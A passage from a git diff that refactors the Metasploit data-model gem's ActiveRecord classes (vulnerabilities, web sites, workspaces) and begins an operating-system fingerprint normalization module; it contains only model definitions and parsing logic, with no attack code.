has_and_belongs_to_many :workspaces, :join_table => 'workspace_members', :uniq => true, :class_name => 'Mdm::Workspace' - serialized_prefs_attr_accessor :nexpose_host, :nexpose_port, :nexpose_user, :nexpose_pass, :nexpose_creds_type, :nexpose_creds_user, :nexpose_creds_pass - serialized_prefs_attr_accessor :http_proxy_host, :http_proxy_port, :http_proxy_user, :http_proxy_pass - serialized_prefs_attr_accessor :time_zone, :session_key - serialized_prefs_attr_accessor :last_login_address # specifically NOT last_login_ip to prevent confusion with AuthLogic magic columns (which dont work for serialized fields) + # + # Serialziations + # - } - end + serialize :prefs, MetasploitDataModels::Base64Serializer.new + + serialized_prefs_attr_accessor :nexpose_host, :nexpose_port, :nexpose_user, :nexpose_pass, :nexpose_creds_type, :nexpose_creds_user, :nexpose_creds_pass + serialized_prefs_attr_accessor :http_proxy_host, :http_proxy_port, :http_proxy_user, :http_proxy_pass + serialized_prefs_attr_accessor :time_zone, :session_key + serialized_prefs_attr_accessor :last_login_address # specifically NOT last_login_ip to prevent confusion with AuthLogic magic columns (which dont work for serialized fields) + + # + # Validations + # + + validates :password, :password_is_strong => true + validates :password_confirmation, :password_is_strong => true + + ActiveSupport.run_load_hooks(:mdm_user, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb index d1e9c408c1..fbf1bdc20d 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln.rb @@ -1,38 +1,60 @@ -module MetasploitDataModels::ActiveRecordModels::Vuln - def self.included(base) - base.class_eval { - belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :vuln_count - belongs_to :service, :class_name => "Mdm::Service", :foreign_key => :service_id - has_many :vuln_details, :dependent => :destroy, :class_name => "Mdm::VulnDetail" - has_many :vuln_attempts, :dependent => :destroy, :class_name => "Mdm::VulnAttempt" - has_many :vulns_refs, :class_name => "Mdm::VulnRef" - has_many :refs, :through => :vulns_refs, :class_name => "Mdm::Ref" +class Mdm::Vuln < ActiveRecord::Base + # + # Callbacks + # + after_update :save_refs - validates :name, :presence => true - validates_associated :refs + # + # Relations + # - after_update :save_refs + belongs_to :host, :class_name => 'Mdm::Host', :counter_cache => :vuln_count + belongs_to :service, :class_name => 'Mdm::Service', :foreign_key => :service_id + has_many :vuln_attempts, :dependent => :destroy, :class_name => 'Mdm::VulnAttempt' + has_many :vuln_details, :dependent => :destroy, :class_name => 'Mdm::VulnDetail' + has_many :vulns_refs, :class_name => 'Mdm::VulnRef' - scope :search, lambda { |*args| - where(["(vulns.name ILIKE ? or vulns.info ILIKE ? or refs.name ILIKE ?)", - "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%" - ]). - joins("LEFT OUTER JOIN vulns_refs ON vulns_refs.vuln_id=vulns.id LEFT OUTER JOIN refs ON refs.id=vulns_refs.ref_id") - } + # + # Through :vuln_refs + # + has_many :refs, :through => :vulns_refs, :class_name => 'Mdm::Ref' - private + # + # Scopes + # - def save_refs - refs.each { |ref| ref.save(:validate => false) } - end + scope :search, lambda { |*args| + where( + [ + '(vulns.name ILIKE ? or vulns.info ILIKE ? or refs.name ILIKE ?)', + "%#{args[0]}%", + "%#{args[0]}%", + "%#{args[0]}%" + ] + ).joins( + 'LEFT OUTER JOIN vulns_refs ON vulns_refs.vuln_id=vulns.id LEFT OUTER JOIN refs ON refs.id=vulns_refs.ref_id' + ) + } - def before_destroy - Mdm::VulnRef.delete_all('vuln_id = ?', self.id) - Mdm::VulnDetail.delete_all('vuln_id = ?', self.id) - Mdm::VulnAttempt.delete_all('vuln_id = ?', self.id) - end + # + # Validations + # - } + validates :name, :presence => true + validates_associated :refs + + private + + def before_destroy + Mdm::VulnRef.delete_all('vuln_id = ?', self.id) + Mdm::VulnDetail.delete_all('vuln_id = ?', self.id) + Mdm::VulnAttempt.delete_all('vuln_id = ?', self.id) end + + def save_refs + refs.each { |ref| ref.save(:validate => false) } + end + + ActiveSupport.run_load_hooks(:mdm_vuln, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb index 46a73890a8..7d258271d5 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_attempt.rb @@ -1,8 +1,15 @@ -module MetasploitDataModels::ActiveRecordModels::VulnAttempt - def self.included(base) - base.class_eval { - belongs_to :vuln, :class_name => "Mdm::Vuln", :counter_cache => :vuln_attempt_count - validates :vuln_id, :presence => true - } - end +class Mdm::VulnAttempt < ActiveRecord::Base + # + # Relations + # + + belongs_to :vuln, :class_name => 'Mdm::Vuln', :counter_cache => :vuln_attempt_count + + # + # Validations + # + + validates :vuln_id, :presence => true + + ActiveSupport.run_load_hooks(:mdm_vuln_attempt, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb index d3655e79cb..d0386728b4 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_detail.rb @@ -1,8 +1,14 @@ -module MetasploitDataModels::ActiveRecordModels::VulnDetail - def self.included(base) - base.class_eval { - belongs_to :vuln, :class_name => "Mdm::Vuln", :counter_cache => :vuln_detail_count - validates :vuln_id, :presence => true - } - end +class Mdm::VulnDetail < ActiveRecord::Base + # + # Relations + # + belongs_to :vuln, :class_name => 'Mdm::Vuln', :counter_cache => :vuln_detail_count + + # + # Validations + # + + validates :vuln_id, :presence => true + + ActiveSupport.run_load_hooks(:mdm_vuln_detail, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb index 567ff44075..f11f9b62f0 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/vuln_ref.rb @@ -1,10 +1,13 @@ -module MetasploitDataModels::ActiveRecordModels::VulnRef - def self.included(base) - base.class_eval { - base.table_name = "vulns_refs" - belongs_to :ref - belongs_to :vuln - } - end +class Mdm::VulnRef < ActiveRecord::Base + self.table_name = 'vulns_refs' + + # + # Relations + # + + belongs_to :ref, :class_name => 'Mdm::Ref' + belongs_to :vuln, :class_name => 'Mdm::Vuln' + + ActiveSupport.run_load_hooks(:mdm_vuln_ref, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb index d0edb57101..5d8ac12ee6 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_form.rb @@ -1,9 +1,16 @@ -module MetasploitDataModels::ActiveRecordModels::WebForm - def self.included(base) - base.class_eval{ - belongs_to :web_site, :class_name => "Mdm::WebSite" - serialize :params, ::MetasploitDataModels::Base64Serializer.new - } - end +class Mdm::WebForm < ActiveRecord::Base + # + # Relations + # + + belongs_to :web_site, :class_name => 'Mdm::WebSite' + + # + # Serializations + # + + serialize :params, MetasploitDataModels::Base64Serializer.new + + ActiveSupport.run_load_hooks(:mdm_web_form, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb index 601497ff47..538e2b0e60 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_page.rb @@ -1,9 +1,16 @@ -module MetasploitDataModels::ActiveRecordModels::WebPage - def self.included(base) - base.class_eval{ - belongs_to :web_site, :class_name => "Mdm::WebSite" - serialize :headers, ::MetasploitDataModels::Base64Serializer.new - } - end +class Mdm::WebPage < ActiveRecord::Base + # + # Relations + # + + belongs_to :web_site, :class_name => 'Mdm::WebSite' + + # + # Serializations + # + + serialize :headers, MetasploitDataModels::Base64Serializer.new + + ActiveSupport.run_load_hooks(:mdm_web_page, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb index 9cc8296ec8..a99750ae2a 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_site.rb @@ -1,41 +1,47 @@ -module MetasploitDataModels::ActiveRecordModels::WebSite - def self.included(base) - base.class_eval { - belongs_to :service, :class_name => "Mdm::Service", :foreign_key => "service_id" - has_many :web_pages, :dependent => :destroy, :class_name => "Mdm::WebPage" - has_many :web_forms, :dependent => :destroy, :class_name => "Mdm::WebForm" - has_many :web_vulns, :dependent => :destroy, :class_name => "Mdm::WebVuln" +class Mdm::WebSite < ActiveRecord::Base + # + # Relations + # - serialize :options, ::MetasploitDataModels::Base64Serializer.new + belongs_to :service, :class_name => 'Mdm::Service', :foreign_key => 'service_id' + has_many :web_forms, :dependent => :destroy, :class_name => 'Mdm::WebForm' + has_many :web_pages, :dependent => :destroy, :class_name => 'Mdm::WebPage' + has_many :web_vulns, :dependent => :destroy, :class_name => 'Mdm::WebVuln' - def to_url(ignore_vhost=false) - proto = self.service.name == "https" ? "https" : "http" - host = ignore_vhost ? self.service.host.address : self.vhost - port = self.service.port + # + # Serializations + # - if Rex::Socket.is_ipv6?(host) - host = "[#{host}]" - end + serialize :options, ::MetasploitDataModels::Base64Serializer.new - url = "#{proto}://#{host}" - if not ((proto == "http" and port == 80) or (proto == "https" and port == 443)) - url += ":#{port}" - end - url - end - - def page_count - web_pages.size - end - - def form_count - web_forms.size - end - - def vuln_count - web_vulns.size - end - } # end class_eval block + def form_count + web_forms.size end + + def page_count + web_pages.size + end + + def to_url(ignore_vhost=false) + proto = self.service.name == "https" ? "https" : "http" + host = ignore_vhost ? self.service.host.address : self.vhost + port = self.service.port + + if Rex::Socket.is_ipv6?(host) + host = "[#{host}]" + end + + url = "#{proto}://#{host}" + if not ((proto == "http" and port == 80) or (proto == "https" and port == 443)) + url += ":#{port}" + end + url + end + + def vuln_count + web_vulns.size + end + + ActiveSupport.run_load_hooks(:mdm_web_site, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb index c826b892ea..3d938d3ef9 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/web_vuln.rb @@ -1,9 +1,16 @@ -module MetasploitDataModels::ActiveRecordModels::WebVuln - def self.included(base) - base.class_eval{ - belongs_to :web_site, :class_name => "Mdm::WebSite" - serialize :params, ::MetasploitDataModels::Base64Serializer.new - } - end +class Mdm::WebVuln < ActiveRecord::Base + # + # Relations + # + + belongs_to :web_site, :class_name => 'Mdm::WebSite' + + # + # Serializations + # + + serialize :params, MetasploitDataModels::Base64Serializer.new + + ActiveSupport.run_load_hooks(:mdm_web_vuln, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb index bfaabcae53..1b03ab6c99 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_request.rb @@ -1,6 +1,3 @@ -module MetasploitDataModels::ActiveRecordModels::WmapRequest - def self.included(base) - base.class_eval{ - } - end +class Mdm::WmapRequest < ActiveRecord::Base + ActiveSupport.run_load_hooks(:mdm_wmap_request, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb index 71cc1e3ab0..1ba8ed2e57 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/wmap_target.rb @@ -1,6 +1,3 @@ -module MetasploitDataModels::ActiveRecordModels::WmapTarget - def self.included(base) - base.class_eval{ - } - end +class Mdm::WmapTarget < ActiveRecord::Base + ActiveSupport.run_load_hooks(:mdm_wmap_target, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb index c3aab6b9c2..8105105ee0 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/workspace.rb @@ -1,184 +1,197 @@ -# NOTE: this AR model is called "Project" on the Pro side +class Mdm::Workspace < ActiveRecord::Base + # + # Callbacks + # -module MetasploitDataModels::ActiveRecordModels::Workspace - def self.included(base) - base.class_eval{ + before_save :normalize - # Usage of the evil eval avoids dynamic constant assignment - # exception when this module is included - eval('DEFAULT = "default"') unless defined? DEFAULT + # + # CONSTANTS + # - has_many :hosts, :dependent => :destroy, :class_name => "Mdm::Host" - has_many :services, :through => :hosts, :class_name => "Mdm::Service", :foreign_key => "service_id" - has_many :notes, :class_name => "Mdm::Note" - has_many :loots, :through => :hosts, :class_name => "Mdm::Loot" - has_many :events, :class_name => "Mdm::Event" - has_many :reports, :dependent => :destroy, :class_name => "Mdm::Report" - has_many :report_templates, :dependent => :destroy, :class_name => "Mdm::ReportTemplate" - has_many :tasks, :dependent => :destroy, :class_name => "Mdm::Task", :order => "created_at DESC" - has_many :clients, :through => :hosts, :class_name => "Mdm::Client" - has_many :vulns, :through => :hosts, :class_name => "Mdm::Vuln" - has_many :creds, :through => :services, :class_name => "Mdm::Cred" - has_many :imported_creds, :dependent => :destroy, :class_name => "Mdm::ImportedCred" - has_many :exploited_hosts, :through => :hosts, :class_name => "Mdm::ExploitedHost" - has_many :sessions, :through => :hosts, :class_name => "Mdm::Session" - has_many :cred_files, :dependent => :destroy, :class_name => "Mdm::CredFile" - has_many :listeners, :dependent => :destroy, :class_name => "Mdm::Listener" - belongs_to :owner, :class_name => "Mdm::User", :foreign_key => "owner_id" - has_and_belongs_to_many :users, :join_table => "workspace_members", :uniq => true, :class_name => "Mdm::User" + DEFAULT = 'default' - before_save :normalize + # + # Relations + # - validates :name, :presence => true, :uniqueness => true, :length => {:maximum => 255} - validates :description, :length => {:maximum => 4096} - validate :boundary_must_be_ip_range + has_many :cred_files, :dependent => :destroy, :class_name => 'Mdm::CredFile' + has_many :creds, :through => :services, :class_name => 'Mdm::Cred' + has_many :events, :class_name => 'Mdm::Event' + has_many :hosts, :dependent => :destroy, :class_name => 'Mdm::Host' + has_many :imported_creds, :dependent => :destroy, :class_name => 'Mdm::ImportedCred' + has_many :listeners, :dependent => :destroy, :class_name => 'Mdm::Listener' + has_many :notes, :class_name => 'Mdm::Note' + belongs_to :owner, :class_name => 'Mdm::User', :foreign_key => 'owner_id' + has_many :report_templates, :dependent => :destroy, :class_name => 'Mdm::ReportTemplate' + has_many :reports, :dependent => :destroy, :class_name => 'Mdm::Report' + has_many :tasks, :dependent => :destroy, :class_name => 'Mdm::Task', :order => 'created_at DESC' + has_and_belongs_to_many :users, :join_table => 'workspace_members', :uniq => true, :class_name => 'Mdm::User' - def web_sites - query = <<-EOQ - SELECT DISTINCT web_sites.* - FROM hosts, services, web_sites - WHERE hosts.workspace_id = #{id} AND + # + # Through :hosts + # + has_many :clients, :through => :hosts, :class_name => 'Mdm::Client' + has_many :exploited_hosts, :through => :hosts, :class_name => 'Mdm::ExploitedHost' + has_many :loots, :through => :hosts, :class_name => 'Mdm::Loot' + has_many :vulns, :through => :hosts, :class_name => 'Mdm::Vuln' + has_many :services, :through => :hosts, :class_name => 'Mdm::Service', :foreign_key => 'service_id' + has_many :sessions, :through => :hosts, :class_name => 'Mdm::Session' + + # + # Validations + # + + validates :name, :presence => true, :uniqueness => true, :length => {:maximum => 255} + validates :description, :length => {:maximum => 4096} + validate :boundary_must_be_ip_range + + # + # If limit_to_network is disabled, this will always return true. + # Otherwise, return true only if all of the given IPs are within the project + # boundaries. + # + def allow_actions_on?(ips) + return true unless limit_to_network + return true unless boundary + return true if boundary.empty? + boundaries = Shellwords.split(boundary) + return true if boundaries.empty? # It's okay if there is no boundary range after all + given_range = Rex::Socket::RangeWalker.new(ips) + return false unless given_range # Can't do things to nonexistant IPs + allowed = false + boundaries.each do |boundary_range| + ok_range = Rex::Socket::RangeWalker.new(boundary) + allowed = true if ok_range.include_range? given_range + end + return allowed + end + + def boundary_must_be_ip_range + errors.add(:boundary, "must be a valid IP range") unless valid_ip_or_range?(boundary) + end + + def creds + Mdm::Cred.find( + :all, + :include => {:service => :host}, + :conditions => ["hosts.workspace_id = ?", self.id] + ) + end + + def self.default + find_or_create_by_name(DEFAULT) + end + + def default? + name == DEFAULT + end + + # + # This method iterates the creds table calling the supplied block with the + # cred instance of each entry. + # + def each_cred(&block) + creds.each do |cred| + block.call(cred) + end + end + + def each_host_tag(&block) + host_tags.each do |host_tag| + block.call(host_tag) + end + end + + def host_tags + Mdm::Tag.find( + :all, + :include => :hosts, + :conditions => ["hosts.workspace_id = ?", self.id] + ) + end + + def web_forms + query = <<-EOQ + SELECT DISTINCT web_forms.* + FROM hosts, services, web_sites, web_forms + WHERE hosts.workspace_id = #{id} AND services.host_id = hosts.id AND - web_sites.service_id = services.id - EOQ - Mdm::WebSite.find_by_sql(query) - end + web_sites.service_id = services.id AND + web_forms.web_site_id = web_sites.id + EOQ + Mdm::WebForm.find_by_sql(query) + end - def web_pages - query = <<-EOQ + def web_pages + query = <<-EOQ SELECT DISTINCT web_pages.* FROM hosts, services, web_sites, web_pages WHERE hosts.workspace_id = #{id} AND services.host_id = hosts.id AND web_sites.service_id = services.id AND web_pages.web_site_id = web_sites.id - EOQ - Mdm::WebPage.find_by_sql(query) - end + EOQ + Mdm::WebPage.find_by_sql(query) + end - def web_forms - query = <<-EOQ - SELECT DISTINCT web_forms.* - FROM hosts, services, web_sites, web_forms - WHERE hosts.workspace_id = #{id} AND - services.host_id = hosts.id AND - web_sites.service_id = services.id AND - web_forms.web_site_id = web_sites.id - EOQ - Mdm::WebForm.find_by_sql(query) - end + def web_sites + query = <<-EOQ + SELECT DISTINCT web_sites.* + FROM hosts, services, web_sites + WHERE hosts.workspace_id = #{id} AND + services.host_id = hosts.id AND + web_sites.service_id = services.id + EOQ + Mdm::WebSite.find_by_sql(query) + end - def unique_web_forms - query = <<-EOQ + def web_vulns + query = <<-EOQ + SELECT DISTINCT web_vulns.* + FROM hosts, services, web_sites, web_vulns + WHERE hosts.workspace_id = #{id} AND + services.host_id = hosts.id AND + web_sites.service_id = services.id AND + web_vulns.web_site_id = web_sites.id + EOQ + Mdm::WebVuln.find_by_sql(query) + end + + def unique_web_forms + query = <<-EOQ SELECT DISTINCT web_forms.web_site_id, web_forms.path, web_forms.method, web_forms.query FROM hosts, services, web_sites, web_forms WHERE hosts.workspace_id = #{id} AND services.host_id = hosts.id AND web_sites.service_id = services.id AND web_forms.web_site_id = web_sites.id - EOQ - Mdm::WebForm.find_by_sql(query) - end - - def web_vulns - query = <<-EOQ - SELECT DISTINCT web_vulns.* - FROM hosts, services, web_sites, web_vulns - WHERE hosts.workspace_id = #{id} AND - services.host_id = hosts.id AND - web_sites.service_id = services.id AND - web_vulns.web_site_id = web_sites.id - EOQ - Mdm::WebVuln.find_by_sql(query) - end - - def self.default - find_or_create_by_name(DEFAULT) - end - - def default? - name == DEFAULT - end - - def creds - Mdm::Cred.find( - :all, - :include => {:service => :host}, - :conditions => ["hosts.workspace_id = ?", self.id] - ) - end - - def host_tags - Mdm::Tag.find( - :all, - :include => :hosts, - :conditions => ["hosts.workspace_id = ?", self.id] - ) - end - - # - # This method iterates the creds table calling the supplied block with the - # cred instance of each entry. - # - def each_cred(&block) - creds.each do |cred| - block.call(cred) - end - end - - def each_host_tag(&block) - host_tags.each do |host_tag| - block.call(host_tag) - end - end - - def web_unique_forms(addrs=nil) - forms = unique_web_forms - if addrs - forms.reject!{|f| not addrs.include?( f.web_site.service.host.address ) } - end - forms - end - - def boundary_must_be_ip_range - errors.add(:boundary, "must be a valid IP range") unless valid_ip_or_range?(boundary) - end - - # - # If limit_to_network is disabled, this will always return true. - # Otherwise, return true only if all of the given IPs are within the project - # boundaries. - # - def allow_actions_on?(ips) - return true unless limit_to_network - return true unless boundary - return true if boundary.empty? - boundaries = Shellwords.split(boundary) - return true if boundaries.empty? # It's okay if there is no boundary range after all - given_range = Rex::Socket::RangeWalker.new(ips) - return false unless given_range # Can't do things to nonexistant IPs - allowed = false - boundaries.each do |boundary_range| - ok_range = Rex::Socket::RangeWalker.new(boundary) - allowed = true if ok_range.include_range? given_range - end - return allowed - end - - private - def valid_ip_or_range?(string) - begin - Rex::Socket::RangeWalker.new(string) - rescue - return false - end - end - - def normalize - boundary.strip! if boundary - end - - } # end class_eval block + EOQ + Mdm::WebForm.find_by_sql(query) end + + def web_unique_forms(addrs=nil) + forms = unique_web_forms + if addrs + forms.reject!{|f| not addrs.include?( f.web_site.service.host.address ) } + end + forms + end + + private + + def normalize + boundary.strip! if boundary + end + + def valid_ip_or_range?(string) + begin + Rex::Socket::RangeWalker.new(string) + rescue + return false + end + end + + ActiveSupport.run_load_hooks(:mdm_workspace, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console index 357ab09ec4..89fd18a533 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console @@ -54,9 +54,7 @@ begin exit end - include MetasploitDataModels - MetasploitDataModels.create_and_load_ar_classes - + MetasploitDataModels.require_models puts "\n\n\n#{mdm_banner[:color]}#{mdm_banner[:text]}\e[0m\n\n\n" diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb new file mode 100644 index 0000000000..cebbdf298e --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm.rb @@ -0,0 +1,12 @@ +# Namespace for models +module Mdm + # Causes the model_name for all Mdm modules to not include the Mdm:: prefix in their name. + # + # This has been supported since ActiveSupport 3.2.1. In ActiveSupport 3.1.0, it checked for _railtie. Before that + # there was no way to do relative naming without manually overriding model_name in each class. + # + # @return [true] + def self.use_relative_model_naming? + true + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb new file mode 100644 index 0000000000..be5710f3c6 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/mdm/host/operating_system_normalization.rb @@ -0,0 +1,984 @@ +module Mdm::Host::OperatingSystemNormalization + # + # Normalize the operating system fingerprints provided by various scanners + # (nmap, nexpose, retina, nessus, etc). + # + # These are stored as notes (instead of directly in the os_* fields) + # specifically for this purpose. + # + def normalize_os + host = self + + wname = {} # os_name == Linux, Windows, Mac OS X, VxWorks + wtype = {} # purpose == server, client, device + wflav = {} # os_flavor == Ubuntu, Debian, 2003, 10.5, JetDirect + wvers = {} # os_sp == 9.10, SP2, 10.5.3, 3.05 + warch = {} # arch == x86, PPC, SPARC, MIPS, '' + wlang = {} # os_lang == English, '' + whost = {} # hostname + + # Note that we're already restricting the query to this host by using + # host.notes instead of Note, so don't need a host_id in the + # conditions. + fingerprintable_notes = self.notes.where("ntype like '%%fingerprint'") + fingerprintable_notes.each do |fp| + next if not validate_fingerprint_data(fp) + norm = normalize_scanner_fp(fp) + wvers[norm[:os_sp]] = wvers[norm[:os_sp]].to_i + (100 * norm[:certainty]) + wname[norm[:os_name]] = wname[norm[:os_name]].to_i + (100 * norm[:certainty]) + wflav[norm[:os_flavor]] = wflav[norm[:os_flavor]].to_i + (100 * norm[:certainty]) + warch[norm[:arch]] = warch[norm[:arch]].to_i + (100 * norm[:certainty]) + whost[norm[:name]] = whost[norm[:name]].to_i + (100 * norm[:certainty]) + wtype[norm[:type]] = wtype[norm[:type]].to_i + (100 * norm[:certainty]) + end + + # Grab service information and assign scores. Some services are + # more trustworthy than others. If more services agree than not, + # than that should be considered as well. + # Each service has a starting number of points. Services that + # are more difficult to fake are awarded more points. The points + # represent a running total, not a fixed score. + # XXX: This needs to be refactored in a big way. Tie-breaking is + # pretty arbitrary, it would be nice to explicitly believe some + # services over others, but that means recording which service + # has an opinion and which doesn't. It would also be nice to + # identify "impossible" combinations of services and alert that + # something funny is going on. + # XXX: This hack solves the memory leak generated by self.services.each {} + fingerprintable_services = self.services.where("name is not null and name != '' and info is not null and info != ''") + fingerprintable_services.each do |s| + points = 0 + case s.name + when 'smb' + points = 210 + case s.info + when /\.el([23456])(\s+|$)/ # Match Samba 3.0.33-0.30.el4 as RHEL4 + wname['Linux'] = wname['Linux'].to_i + points + wflav["RHEL" + $1] = wflav["RHEL" + $1].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /(ubuntu|debian|fedora|red ?hat|rhel)/i + wname['Linux'] = wname['Linux'].to_i + points + wflav[$1.capitalize] = wflav[$1.capitalize].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /^Windows/ + win_sp = nil + win_flav = nil + win_lang = nil + + ninfo = s.info + ninfo.gsub!('(R)', '') + ninfo.gsub!('(TM)', '') + ninfo.gsub!(/\s+/, ' ') + ninfo.gsub!('No Service Pack', 'Service Pack 0') + + # Windows (R) Web Server 2008 6001 Service Pack 1 (language: Unknown) (name:PG-WIN2008WEB) (domain:WORKGROUP) + # Windows XP Service Pack 3 (language: English) (name:EGYPT-B3E55BF3C) (domain:EGYPT-B3E55BF3C) + # Windows 7 Ultimate (Build 7600) (language: Unknown) (name:WIN7) (domain:WORKGROUP) + # Windows 2003 No Service Pack (language: Unknown) (name:VMWIN2003) (domain:PWNME) + + #if ninfo =~ /^Windows ([^\s]+)(.*)(Service Pack |\(Build )([^\(]+)\(/ + if ninfo =~ /^Windows (.*)(Service Pack [^\s]+|\(Build [^\)]+\))/ + win_flav = $1.strip + win_sp = ($2).strip + win_sp.gsub!(/with.*/, '') + win_sp.gsub!('Service Pack', 'SP') + win_sp.gsub!('Build', 'b') + win_sp.gsub!(/\s+/, '') + win_sp.tr!("()", '') + else + if ninfo =~ /^Windows ([^\s+]+)([^\(]+)\(/ + win_flav = $2.strip + end + end + + + if ninfo =~ /name: ([^\)]+)\)/ + hostname = $1.strip + end + + if ninfo =~ /language: ([^\)]+)\)/ + win_lang = $1.strip + end + + win_lang = nil if win_lang =~ /unknown/i + win_vers = win_sp + + wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points + wlang[win_lang] = wlang[win_lang].to_i + points if win_lang + wflav[win_flav] = wflav[win_flav].to_i + points if win_flav + wvers[win_vers] = wvers[win_vers].to_i + points if win_vers + whost[hostname] = whost[hostname].to_i + points if hostname + + case win_flav + when /NT|2003|2008/ + win_type = 'server' + else + win_type = 'client' + end + wtype[win_type] = wtype[win_type].to_i + points + end + + when 'ssh' + points = 104 + case s.info + when /honeypot/i # Never trust this + nil + when /ubuntu/i + # This needs to be above /debian/ becuase the ubuntu banner contains both, e.g.: + # SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6 + wname['Linux'] = wname['Linux'].to_i + points + wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /debian/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Debian'] = wflav['Debian'].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /FreeBSD/ + wname['FreeBSD'] = 